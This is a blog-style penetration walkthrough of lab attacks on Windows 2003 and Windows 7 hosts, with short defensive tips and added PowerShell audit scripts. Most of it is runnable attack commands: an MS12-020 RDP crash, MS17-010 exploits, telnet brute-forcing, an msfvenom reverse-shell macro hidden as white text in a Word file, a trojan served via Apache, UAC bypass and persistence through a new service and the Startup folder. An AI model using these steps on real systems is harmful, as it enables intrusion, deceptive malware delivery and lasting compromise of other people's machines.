Related parameters
Kali's IP address is: 192.168.0.103/24
Win2003's IP address is: 192.168.0.138/24
(1) Blue screen attack
Principle: a defect in the operating system kernel is triggered by sending it a large number of crafted packets; the vulnerability may cause a denial of service or allow remote code execution.
Prerequisite: the target has port 3389 open, and the vulnerability only affects certain operating systems.
Steps:
1. Scan
nmap -sS -O [IP address] or nmap -sT [IP address]
Use whichever you like (I am used to these two).
If the scan of the 2003 box shows no port 3389, enable Remote Desktop on it as I did; scan again and the port is there.
Start the attack:
1. Use auxiliary/scanner/rdp/ms12_020_check to check whether the target has this vulnerability:
root@kali:~# msfconsole
msf > use auxiliary/scanner/rdp/ms12_020_check
msf auxiliary(scanner/rdp/ms12_020_check) > set rhosts 192.168.0.138
msf auxiliary(scanner/rdp/ms12_020_check) > run
2. Use auxiliary/dos/windows/rdp/ms12_020_maxchannelids module to attack
root@kali:~# msfconsole
msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set rhost 192.168.0.138
msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > run
(Screenshots: attacker side, victim side.)
How to protect against it?
As in the screenshots above: right-click My Computer → Properties, turn off Remote Desktop there, then Apply → OK.
Or click the firewall's Advanced → Settings and turn off Remote Desktop.
Test again.
Note: the target no longer has port 3389 open.
(2) Port 445 penetration
Prerequisite: The other party has opened port 445.
Theory: too much to go into here (scratches head); look it up yourself. The attack goes in through the IPC$ share.
net share lists the current shares (IPC$ is what shares our disk).
If port 445 does not show up in the scan, enable it (see the picture):
1. Open Services and start the Server service.
2. In CMD enter net share; when it asks whether to start the service, press Y.
Start the attack
search ms17 # lists the matching modules
show options # lists the required parameters
root@kali:~#msfconsole
msf > use exploit/windows/smb/ms17_010_psexec
msf exploit(windows/smb/ms17_010_psexec) > set rhost 192.168.0.138
msf exploit(windows/smb/ms17_010_psexec) > run
meterpreter > screenshot # take a screenshot
Screenshot saved to: /root/HlFTZjqL.jpeg
meterpreter >
Successful attack:
Protection: disable the Server service.
Example: Stop → Disable → Apply → OK.
Attack again: I found I could not get in at all!!!
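As an added check that is not part of the original post: a PowerShell script, assumed to run in an elevated PowerShell 2.0 or later on the Windows host, that confirms the Remote Desktop protection from section (1) and the Server service protection from section (2) actually took effect instead of trusting the dialog boxes.

```powershell
# Added example, not from the original post: verify the two protections above
# (Remote Desktop off, Server service off) from an elevated PowerShell on the
# Windows host. Assumes PowerShell 2.0 or later.

function Test-RdpDisabled {
    # fDenyTSConnections = 1 means Remote Desktop connections are refused
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $val = (Get-ItemProperty -Path $key -Name fDenyTSConnections -ErrorAction SilentlyContinue).fDenyTSConnections
    return ($val -eq 1)
}

function Test-ServerServiceOff {
    # LanmanServer is the "Server" service that answers SMB on port 445
    $svc = Get-WmiObject -Class Win32_Service -Filter "Name='LanmanServer'"
    if ($svc -eq $null) { return $true }
    return ($svc.State -eq 'Stopped' -and $svc.StartMode -eq 'Disabled')
}

function Get-ListeningTcpPorts {
    # Parse netstat so this also works on Win7 / 2003 (no Get-NetTCPConnection there)
    netstat -ano | ForEach-Object {
        if ($_ -match '^\s*TCP\s+\S+:(\d+)\s+\S+\s+LISTENING') { [int]$matches[1] }
    } | Sort-Object -Unique
}

$listening = @(Get-ListeningTcpPorts)
$checks = @(
    @{ Name = 'Remote Desktop disabled (fDenyTSConnections = 1)'; Ok = (Test-RdpDisabled) },
    @{ Name = 'Server service stopped and disabled';              Ok = (Test-ServerServiceOff) },
    @{ Name = 'Port 3389 not listening';                          Ok = ($listening -notcontains 3389) },
    @{ Name = 'Port 445 not listening';                           Ok = ($listening -notcontains 445) }
)
foreach ($check in $checks) {
    $status = if ($check.Ok) { 'PASS' } else { 'FAIL' }
    Write-Output ("[{0}] {1}" -f $status, $check.Name)
}
```

A FAIL on the port lines while the first two lines PASS usually means the service was stopped but not yet disabled, or a reboot is still pending.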
(3) Telnet attack
Turn on the telnet service on the target: set the startup type to Automatic → Apply → OK, then start the service.
Then scan with nmap:
nmap -sV -O [IP address] or nmap -sT [IP address]
You can see that telnet's port 23 is open.
Use the auxiliary/scanner/telnet/telnet_login module to start the attack.
(1) msf module brute force cracking
msf > use auxiliary/scanner/telnet/telnet_login
msf auxiliary(scanner/telnet/telnet_login) > set rhosts 192.168.0.138
rhosts => 192.168.0.138
msf auxiliary(scanner/telnet/telnet_login) > set pass_file ~/password.txt
msf auxiliary(scanner/telnet/telnet_login) > set USERNAME administrator
msf auxiliary(scanner/telnet/telnet_login) > run
Note: ~/password.txt is the password dictionary under ~ (you can generate it yourself); the password here is 14106821.
After logging in through telnet, we can carry out operations such as privilege escalation.
(2) hydra brute force cracking
-L is followed by the username list
-P is followed by the password list
root@kali:~# hydra -L ~/user.txt -P ~/password.txt 192.168.43.123 telnet
192.168.43.123 is the target IP address.
Then log in with telnet.
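Added detection example, not from the original post: on the Windows side the dictionary attack above shows up as a burst of failed logons for one account, so the script counts failed logons in the Security log per account and source address (event 4625 on Win7 and later, 529 on Windows Server 2003). The threshold of 10 failures in 5 minutes is an assumed value.

```powershell
# Added example, not from the original post: find password guessing against the
# Windows host by counting failed logons per account and source address in the
# Security log. Event 4625 = logon failure on Win7 and later, 529 on Windows 2003.
# Threshold (10 failures) and window (5 minutes) are assumed values; tune them.

function ConvertFrom-FailedLogon {
    param($Entry)   # an entry from Get-EventLog
    $m = $Entry.Message
    # 4625 has "Account For Which Logon Failed: ... Account Name: x"; 529 has "User Name: x"
    $acct = if ($m -match 'Account For Which Logon Failed:[\s\S]*?Account Name:\s+(\S+)') { $matches[1] } elseif ($m -match 'User Name:\s+(\S+)') { $matches[1] } else { '?' }
    $src  = if ($m -match 'Source Network Address:\s+(\S+)') { $matches[1] } else { '-' }
    New-Object PSObject -Property @{ Time = $Entry.TimeGenerated; Account = $acct; Source = $src }
}

function Find-LogonBruteForce {
    param($Events, [int]$Threshold = 10, [int]$WindowMinutes = 5)
    # Group by account and source, then slide a window over the sorted timestamps
    $Events | Group-Object { "$($_.Account)|$($_.Source)" } | ForEach-Object {
        $group = $_
        $times = @($group.Group | Sort-Object Time | ForEach-Object { $_.Time })
        for ($i = 0; ($i + $Threshold - 1) -lt $times.Count; $i++) {
            $span = $times[$i + $Threshold - 1] - $times[$i]
            if ($span.TotalMinutes -le $WindowMinutes) {
                $parts = $group.Name -split '\|'
                New-Object PSObject -Property @{
                    Account = $parts[0]; Source = $parts[1]
                    Failures = $times.Count; FirstSeen = $times[$i]
                }
                break
            }
        }
    }
}

# Failed logons from the last 24 hours (needs an elevated prompt to read the Security log)
$since  = (Get-Date).AddHours(-24)
$failed = Get-EventLog -LogName Security -InstanceId 4625, 529 -After $since -ErrorAction SilentlyContinue |
          ForEach-Object { ConvertFrom-FailedLogon $_ }
Find-LogonBruteForce -Events $failed | Format-Table Account, Source, Failures, FirstSeen -AutoSize
```

Auditing of logon events must be enabled on the host for the Security log to contain these entries at all; telnet logons may report "-" as the source address, in which case the grouping still works per account.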
(3) Macro virus
Prerequisite: Office is installed. There is no Office on the 2003 box, so I use Win7 as the example.
root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.43.249 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe
This generates a pile of code:
1. Cut out the part from Sub Auto_Open() to End Sub (code 1).
2. The part in the picture above, roughly from the few letters on the first line to the end (code 2).
1. Create a new Word document on Win7: New → open Word → View → new macro.
2. Paste code 1 into the macro editor and press Ctrl+S.
3. Copy code 2 into the Word document and set its font colour to white (the recipient cannot see it at all).
4. Use an msf module to catch the callback.
I had just finished writing this and forgot to save, damn, rewriting it (ugh).
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.0.105
msf exploit(multi/handler) > exploit
Successful penetration
(4) Trojan horse program
The principle of generating it with msfvenom is similar to the macro virus, but I think it is more flexible:
1. It can be installed as a service (and so start automatically) as long as Kali stays up and its IP does not change (a fixed IP is fine; on the intranet).
2. It can be put in the Startup folder.
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.0.105 lport=4444 -f exe R > /var/www/html/shell.exe
How to upload the Trojan horse program!
1. Port 445 brute force, then upload via ftp
2. Drag it over directly
3. apache
4. ...
445 penetration
Use the exploit/windows/smb/ms17_010_eternalblue module for penetration (requires the other party to open 445)
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.0.113
rhost => 192.168.0.113
msf exploit(windows/smb/ms17_010_eternalblue) > run
445 Successful penetration
2. apache
cd /var/www/html
cp index.html index.html.bak  # back up the original page
rm index.html
/etc/init.d/apache2 restart  # the Apache service on Kali is named apache2
Then open the address in the Win7 browser and download the file.
Start the attack
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.0.105
msf exploit(multi/handler) > exploit
II. Privilege escalation
Here I use exploit/windows/local/bypassuac for the privilege escalation step.
msf > use exploit/windows/local/bypassuac
msf exploit(windows/local/bypassuac) > set session 1
msf exploit(windows/local/bypassuac) > run
meterpreter > getsystem # escalate privileges
meterpreter > shell
C:\Windows\system32> copy /d "C:\Users\win2007-1\Desktop\shell.exe" "C:\Windows\system32\shell.exe"
C:\Windows\system32> SC CREATE KJService binPath= "C:\windows\system32\shell.exe" START= auto DISPLAYNAME= "KJService nice" TYPE= own
C:\Windows\system32> net start KJService
Starting the service is enough. Check whether it was successful.
2. Startup folder. Same attack and privilege escalation as above.
meterpreter > shell
C:\Windows\system32> copy /d "C:\Users\win2007-1\Desktop\shell.exe" "C:\Users\win2007-1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\shell.exe"
Check: success!
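Added example, not from the original post: an audit of the two persistence spots used above (an auto-start service and the Startup folders) on the Win7 host. It assumes an elevated PowerShell 2.0 or later, the Win7 profile layout under C:\Users, and that a binary dropped with copy gets a fresh CreationTime, which is what the service check keys on alongside its location and signature.

```powershell
# Added example, not from the original post: audit the two persistence spots used
# above, auto-start services and the Startup folders, on the Win7 host. Assumes an
# elevated PowerShell 2.0 or later and the Win7 profile layout under C:\Users.

function Get-SuspiciousServices {
    param([int]$NewerThanDays = 30)
    # A copied shell.exe gets a fresh CreationTime; that, an unusual path or a
    # missing binary is enough to report the service for a closer look
    $cutoff = (Get-Date).AddDays(-$NewerThanDays)
    Get-WmiObject -Class Win32_Service | ForEach-Object {
        if (-not $_.PathName) { return }
        # Strip quotes and arguments: '"C:\x\y.exe" -k net' -> 'C:\x\y.exe'
        $exe = if ($_.PathName -match '^"([^"]+)"') { $matches[1] } else { ($_.PathName -split '\s+')[0] }
        $file = Get-Item -LiteralPath $exe -ErrorAction SilentlyContinue
        $sig  = Get-AuthenticodeSignature -FilePath $exe -ErrorAction SilentlyContinue
        $reasons = @()
        if ($exe -notmatch '^[A-Za-z]:\\(Windows|Program Files)') { $reasons += 'unusual path' }
        if ($file -eq $null) { $reasons += 'binary missing' } elseif ($file.CreationTime -gt $cutoff) { $reasons += 'binary created recently' }
        if ($reasons.Count -gt 0) {
            $sigStatus = if ($sig) { $sig.Status } else { 'n/a' }
            New-Object PSObject -Property @{
                Service = $_.Name; StartMode = $_.StartMode; Path = $exe
                Signature = $sigStatus; Reason = ($reasons -join ', ')
            }
        }
    }
}

function Get-StartupFolderItems {
    # All-users Startup folder plus the per-user one of every profile
    $folders = @((Join-Path $env:ProgramData 'Microsoft\Windows\Start Menu\Programs\Startup'))
    foreach ($userDir in (Get-ChildItem (Join-Path $env:SystemDrive 'Users') -ErrorAction SilentlyContinue)) {
        $folders += Join-Path $userDir.FullName 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'
    }
    $folders | Where-Object { Test-Path $_ } | ForEach-Object { Get-ChildItem $_ -Force } |
        Where-Object { $_.Name -ne 'desktop.ini' } | Select-Object FullName, CreationTime
}

Get-SuspiciousServices | Format-Table Service, StartMode, Reason, Signature, Path -AutoSize
Get-StartupFolderItems | Format-Table -AutoSize
```

On Win7 many Microsoft binaries are catalog-signed, so a NotSigned status on its own is not proof of tampering; the Reason column is the part to act on.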
That's roughly it; I will post a more detailed one later.
If anything is wrong, please correct me; I am a newbie too.